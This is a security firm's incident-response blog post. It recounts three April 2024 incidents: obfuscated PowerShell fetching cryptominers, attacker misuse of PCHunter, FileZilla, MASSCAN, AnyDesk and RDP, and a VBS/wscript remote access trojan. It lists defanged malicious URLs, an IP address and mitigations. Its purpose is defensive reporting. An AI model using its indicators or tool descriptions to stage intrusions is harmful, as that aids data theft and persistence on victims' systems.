Between April 17-24, 2024, Blackpoint’s Security Operations Center (SOC) responded to 188 total incidents. These incidents included 16 on-premises Managed Detection and Response (MDR) incidents, 4 Cloud Response for Google Workspace, and 168 Cloud Response for Microsoft 365 incidents, with confirmed or likely threat actor use of:
- PowerShell scripts and malicious domains for execution
- PC Hunter and other legitimate tools for persistence and discovery
- A remote access trojan (RAT) and scheduled tasks for persistence
In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.
Please note: As these analyses concern recent incidents in actively monitored environment, certain details may be occasionally omitted and / or obfuscated, to better our partners and any still-ongoing investigations. However, we felt that these incidents were important enough to be brought to the community’s attention as fast as possible, and so included them in this public writeup.
Please feel free to reach out to the APG directly if you have any questions about a specific incident.
Malicious PowerShell Scripts and Unauthorized Cryptomining Incident with Government Partner on April 19, 2024
Topline Takeaways
- Industry target: Government
- Attacker information:
- PowerShell scripts
- hxxps://raw.githubusercontent.com/upinfoarch/up/master/domtar
- hxxp://dfdfjkbcv.net
- Antivirus (AV) and / or Endpoint Detection and Response (EDR) present in environment? Yes
- Threat assessment for partners:
- The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use malicious PowerShell scripts to exploit other government organizations over the next 12 months.
- Recommended remediations and mitigations:
- Heuristics-based activity monitoring and remediation
- Employee security training
- Multifactor authentication (MFA)
What happened?
Last Friday, Blackpoint’s SOC was alerted to PowerShell executing base64 commands on a government partner’s client. Further investigation revealed the commands leveraging multiple obfuscation techniques: a common indicator of malicious intent.
Blackpoint’s SOC identified two URLs within the decoded script, both with negative reputations.
One of the identified URLs, “hxxp://dfdfjkbcv.net”, was identified as malicious by 13 security vendors on VirusTotal (1). The domain has been observed in multiple cryptomining malware (2 and 3).
The Blackpoint SOC immediately isolated the device and reached out to our impacted government partner to advise on the incident and provide further remediation recommendations.
More About Malicious PowerShell Scripts and Unauthorized Cryptomining
While threat actors very frequently use PowerShell to execute malicious commands during their attacks to deploy ransomware, spy on and exfiltrate sensitive information, and conduct other malicious activities (5), in this incident, the APG and SOC believe the primary goal of this attack was to install cryptomining malware on Government machines
“Cryptomining” is the process of creating a unit of cryptocurrency where “miners” solve complex mathematical equations to validate data blocks and add transaction details to a blockchain. The user is then rewarded with a payment via cryptocurrency (4). Threat actors will often use malware to illegally access and exploit victim’s computer resources, secretly running private cryptomining operations for financial gain until discovered.
Some of the more popular crypto mining malware examples include XMrig, DarkGate, and RubyMiner (3).
While cryptomining malware is not often considered as great a threat to organizations’ security or general operations as other malware types, threat actors that gain this type of unauthorized access to victim devices can sell that access to other malicious actors.
In the wrong hands, this access can help advanced adversaries and technically skilled ransomware threat actors to download and execute additional malware – such as backdoors and information stealers – and discover and exfiltrate sensitive information – such as credentials and intellectual property.
APG Threat Analysis of Malicious PowerShell Scripts and Unauthorized Cryptomining for 2024
The APG predicts that threat actors will likely continue to use obfuscated PowerShell scripts to fetch, download, and execute malware from malicious domains – including cryptomining malware – over the next 12 months.
We base this assessment on internal telemetry and analysis of this incident and other Blackpoint environment incidents, as well as fellow researchers’ observations.
In 2023, for example, security researchers with Cisco Talos reported an ongoing cryptocurrency mining campaign that deployed malicious payloads by abusing a legitimate tool, Advanced Installer (6). The attackers reportedly used it to package installers with malicious PowerShell and Windows batch scripts.
Recommended Malicious PowerShell Scripts Mitigations and Remediations
The APG recommends the following actions to help mitigate the use of PowerShell scripts to reach out to malicious domains to retrieve and download malware payloads:
- Heuristics-based activity monitoring and remediation to detect unusual patterns that could be indicative of malicious behavior by threat actors. In this incident, it was the heuristics alerting to our partner’s environment that caught the abuse of local machines before they could have their memory, computational resources, and ultimately access conscripted for unauthorized use.
- Employee security training to ensure that all users understand what is (and is not) authorized use of organization resources and decrease the potential of internal threat actors “getting away with” the installation of malicious scripts. Of course, the standard phishing training recommendations apply here, too, to avoid net-new malicious access!
- MFA enforced on all user accounts – but especially those with privileged access! – to help decrease the chances of undetected credential compromise.
PCHunter Incident with Industrials Partner on April 22, 2024
Topline Takeaways
- Industry target: Industrials
- Attacker information:
- PCHunter64.exe
- FileZilla
- Remote desktop protocol (RDP)
- AV and / or EDR present in environment? Yes
- Threat assessment for partners:
- The APG predicts that it is very likely that threat actors will continue to use legitimate, allowlisted Windows tools to exploit other industrials organizations over the next 12 months.
- Recommended remediations and mitigations:
- Least-privilege access controls
- Zero trust network architecture
- Regularly audit both environment and endpoints
PCHunter Incident Timeline for April 22, 2024
- 11:55 p.m. ET: Blackpoint’s MDR alerted to an industrial end client’s security product blocking the hacking tool “PCHunter64.exe” running from the unusual location of “C:\PerfLogs”.
- 11:58 p.m. ET: An MDR analyst began initial triage and investigation, during which six additional impacted devices are discovered. The investigation also discovered share mount failures of ADMIN$ by two separate user accounts on a single machine and infecting several other machines, as well as other indicators of compromise (IoCs), including the threat actor’s use of:
- FileZilla
- MASSCAN
- PowerTool
- AnyDesk
- RDP for inter-machine network connections
- 11:58 p.m. ET: The analyst escalated the incident to senior SOC leadership.
- 12:02 a.m. ET: The senior SOC analyst isolated all seven impacted endpoints from all external and internal communications.
- 12:11 a.m. ET: The SOC made contact with the partner about the incident and provided additional remediation advice.
More About Abuse of Legitimate Windows Tools and Processes: PC Hunter, MASSCAN, AnyDesk, and RDP
PC Hunter
PC Hunter is a toolkit with access to hundreds of settings including kernels, kernel modules, processes, network, startup, and more (7).
When abused, this tool can allow threat actors to effectively access sensitive processes, collect system information, and terminate security software.
FileZilla
FileZilla is a free file transfer protocol (FTP) software that can be used to manage website files, upload and download files, backup data, and transfer files between local and remote servers (8).
FileZilla is often abused by threat actor to exfiltrate sensitive data from victim environments. This data can later be sold on cybercriminal markets, held for extortion purposes, and used to conduct future cyberattacks.
The APG has previously tracked ransomware operators that have been observed using FileZilla to aid in exfiltration operations, including Akira (9), Trigona, Mallox, LockBit (10), Karakurt Hacking Team, and AvosLocker(11).
MASSCAN
MASSCAN is a TCP port scanner that transmits SYN packets asynchronously and produces results similar to nmap (12).
MASSCAN can be abused by threat actors to identify running application and services on remote open ports. The Akira ransomware operation has previously deployed MASSCAN to discover additional remote system targets (13).
AnyDesk
AnyDesk is a legitimate and popular remote monitoring and management (RMM) tool used to remotely access and manage devices within an organization’s environment… and is often exploited by threat actors during cyberattacks.
The APG has identified 17 ransomware operators that have utilized the AnyDesk RMM tool during cyberattacks.
Ironically, not only do threat actors abuse legitimate tools such as AnyDesk to conduct attacks, but they also occasionally target them, as well. In January 2024, AnyDesk was targeted for its own cyberattack demonstrating the double-edged efficacy of RMM tools in MSP and organizational environments for sysadmins and threat actors alike (14).
RDP
RDP is a network communications protocol built into enterprise and pro versions of Windows. It is used for remote access to physical work devices, particularly for technicians to perform remote administrative work.
However, just like AnyDesk and RMM tools, threat actors abuse RDP for their own unauthorized remote access onto organizational devices (15).
RDP can be targeted for initial access via brute force, misconfigurations, vulnerabilities, and exposed instances. Threats also achieve persistence using RDP, as the protocol is a legitimate and pre-installed Windows function that better blends in with legitimate traffic. Finally, RDP facilitates lateral movement, as its entire purpose is to allow (authorized) access to remote devices.
The APG has identified 29 ransomware operations that have previously targeted or used RDP during cyberattacks, including:
- LockBit
- Black Basta
- ALPHV / BlackCat
APG Threat Analysis of Abuse of Legitimate Windows Tools and Processes for 2024
The APG predicts that threat actors will very likely continue to abuse legitimate Windows tools and processes – particularly RMM and other remote management and access tools – over the next 12 months.
We base this assessment in part on broader industry research, trends, and advisories.
Specifically, U.S. CISA previously released guidance on RMM software, warning of threat actors’ use of these legitimate tools for initial access, persistence, and lateral movement.
Additionally, the APG frequently observes threat actors’ continued attempted abuse of RMM tools during cyberattacks within SOC incidents and secured environments. While these tools are useful, RMMs and similar remote management tools present a tremendous amount of risk to MSPs and other partner organizations, as already-established tools for lateral movement make attractive targets for threat actors attempting to remain undetected by AV or EDR solutions.
Recommended Legitimate Windows Tools Abuse Mitigations and Remediations
The APG recommends the following actions to help mitigate the use of legitimate tools for malicious purposes by threat actors:
- Implement least-privilege access controls wherever possible, to quarantine even previously unknown compromised users to a limited set of applications and endpoints. The fewer things users have even passive access to that are not necessary for daily operations, the less likely a threat actor can find an easy point to hop from one device to another.
- Adopt a zero trust strategic security philosophy, which assumes that all requests to each resource is malicious until otherwise proven by credentials, authorizations, and other checks – even if the request comes from a previously acceptable and cleared source. (Ask every time it’s feasible to do so!)
- Regularly audit both environment and endpoints for malingering credentials and authorizations that may no longer be needed, as well as ensuring that all technical and administrative controls are in place and effective throughout the organization. A policy is only as effective as how well it’s followed and enforced within your environment!
Remote Access Trojan Incident with Healthcare Partner on April 22, 2024
Topline Takeaways
- Industry target: Healthcare
- Attacker information:
- RAT
- wscript.exe
- VBS scripts
- AV and / or EDR present in environment? Yes
- Threat assessment for partners:
- The APG predicts that it is almost certainly that threat actors will continue to use RATs leveraging wscripts, VBS scripts, and PowerShell to exploit other Healthcare organizations over the next 12 months.
- Recommended remediations and mitigations:
- Scripting language controls
- Controls preventing unauthorized use of legitimate tools and / or allowlisted applications
- Heuristics-based activity monitoring and remediation
RAT Incident Timeline for April 22, 2024
- 10:23 p.m. ET: Blackpoint’s MDR alerted to malicious wscript, bits download, autoit, and scheduled tasks executed and installed on a healthcare end client host. The files are saved in the public folder, where the threat actor (attempted to) evade detection while continuing malicious downloads of VBS scripts, wscripts, PowerShell scripts, and other executable files. The threat actor also downloaded a RAT in an attempt to control access to the infected device.
- 10:23 p.m. ET: An MDR analyst began initial triage and investigation, during which they observed the threat actor’s RAT connecting to Netherlands-based IP address and a known-malicious IP address in the United States.
- 10:44 p.m. ET: The analyst isolated the impacted endpoint from all external and internal communications, and scrubbed all malicious scheduled tasks to prevent further threat activity.
- 10:46 p.m. ET: The analyst escalated the incident to senior SOC leadership.
- 10:50 p.m. ET: The SOC made contact with the partner about the incident and provided additional remediation advice.
While the RAT in this incident was not identified during the active investigation, one of the IP addresses identified during Blackpoint’s SOC investigation – 104.243.32.185 – has previously been linked to an AsyncRAT campaign (16).
Active since at least 2019, AsyncRAT is an open-source RAT whose features include keylogging, initial access techniques, and final payload distribution (16).
More About Abuse of Scripting Languages and Scheduled Tasks
Scripting languages are programming languages that are used to manipulate, customize, and automate the functions of an existing software or system. Threat actors abuse these languages and interfaces to interact with and command victim endpoints.
Most systems come with built-in command line interfaces of some type – Unix Shell, PowerShell, Windows Command Shell, etc. – making it easier for threat actors to abuse when targeting a victim environment (17).
Scheduled tasks are just that: tasks that are scheduled to run according to a defined schedule. They could trigger on specific days or dates, a time, based on another event occurring (such as endpoint startup), and more.
Threat actors often abuse scheduled tasks to facilitate initial or recurring execution of malicious scripts. Threat actors’ tasks can be:
- Scheduled on remote systems to run at system startup,
- On a specific schedule for persistence, or
- Can be otherwise abused to run under the context of a specified account, such as one with elevated privileges (18).
APG Threat Analysis of RATs and Abuse of Scripting Languages and Scheduled Tasks for 2024
The APG predicts that threat actors will almost certainly continue to use RATs and abuse scripting languages and scheduled tasks over the next 12 months.
We base this assessment especially on our own research and development on RATs and abuse of default device capabilities.
Of particular note for this incident, in 2022, the APG and SOC released a whitepaper detailing live environment observations of a threat actor using a typically allowlisted remote access tool, Arechclient2, running the scripting language AutoIt to conduct malicious activities.
The APG has further tracked 30 global ransomware operations using PowerShell scripts to conduct malicious activities, in addition to attempts on our own Blackpoint SOC-protected environments.
Finally, MITRE has tracked no fewer than 42 threat groups – including Turla, APT39, FIN7, and Sandworm Team – as well as 61 software/malware – including SmokeLoader, DarkGate, and IcedID – all of which abuse VBS scripts for malicious activities (19).
Recommended RAT Mitigations and Remediations
The APG recommends the following actions to help mitigate the use of malicious scheduled tasks and scripting languages:
- Minimize the use of – or implement strict controls on – the use of scripting languages, since threat actors clearly rely on scripting languages to deploy malware and conduct malicious activities.
- Implement application controls to block or restrict unauthorized applications from executing in suspicious or malicious ways – paying special attention to otherwise allowlisted apps or activities on the broader organizational environment that your average user typically wouldn’t use or do. (Even if your organization has developers, not everyone needs administrative controls to their endpoint or the ability to execute original scripts on their device!)
- Heuristics-based activity monitoring and remediation can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
References and Resources
- VirusTotal’s Repository: “dfdfjkbcv.net” by VirusTotal on April 18, 2024
- Certego’s Blog: “Handling a distributed cryptominer AD worm” by Gabriele Pippi on December 24, 2020
- ThreatFox’s Database: “Malware: win.monero_miner” by ThreatFox on April 24, 2022
- CrowdStrike’s Blog: “What is Crypto-Malware?” by Kurt Baker on October 04, 2023
- MITRE’s Repository: “Command and Scripting Interpreter: PowerShell” by MITRE on March 01, 2024
- Cisco Talos’s Blog: “Cybercriminals target graphic designers with GPU miners” by Chetan Raghuprasad on September 07, 2023
- Broadcom’s Blog: “Audit: PCHunter Tool Activity” by Broadcom on N/A
- FileZilla’s Blog: “FileZilla” by FileZilla on N/A
- U.S. CISA’s Advisories: “#StopRansomware: Akira Ransomware” by CISA on April 18, 2024
- U.S. CISA’s Advisories: “#StopRansomware: LockBit 3.0” by CISA on March 16, 2023
- U.S. CISA’s Advisories: “#StopRansomware: AvosLocker Ransomware (Update)” by CISA on October 11, 2023
- Kali’s Blog: “MASSCAN” by Kali on March 11, 2024
- Trend Micro’s Blog: “Ransomware Spotlight: Akira” by Trend Micro Research on October 05, 2023
- Blackpoint Cyber’s Blog: “AnyDesk Attack Response Stirs Threat Analyst Criticism and Doubts” by Blackpoint Cyber on February 07, 2024
- Blackpoint Cyber’s Blog: “How RDP Attacks Go Down” by Blackpoint Cyber on May 31, 2022
- Blackpoint Cyber’s Blog: “Vulnerable RMM Tools and Vulnerable Industries: Why Vigilance is Key” by Blackpoint Cyber on March 28, 2024
- SOCRadar’s Blog: “Campaign Alert: The Year-Long Shadow of AsyncRAT in U.S. Infrastructure” by SOCRadar on March 18, 2024
- MITRE’s Repository: “Command and Scripting Interpreter” by MITRE on March 27, 2023
- MITRE’s Repository: “Scheduled Task / Job” by MITRE on March 01, 2024